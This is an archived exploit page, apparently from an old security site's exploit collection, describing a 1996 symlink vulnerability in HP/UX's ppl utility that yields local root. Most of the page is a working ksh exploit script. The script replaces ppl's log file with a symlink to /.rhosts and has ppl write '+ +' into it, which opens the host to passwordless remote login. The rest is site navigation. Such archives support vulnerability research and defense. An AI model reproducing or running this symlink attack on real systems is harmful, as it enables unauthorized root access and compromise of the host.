HP/UX ppl symlink problem

Summary
Description:ppl insecurely creates log files in world writeable directory, I'm sure you can see where this is headed.
Author:Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable ppl, 9.x 10.x
Date:October 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit: 

#!/bin/ksh

# need update for 10.X
# 10.X =/var/ppl/log

VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
        LOG=/var/ppl/log
else
        LOG=/usr/spool/ppl/log
fi

mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]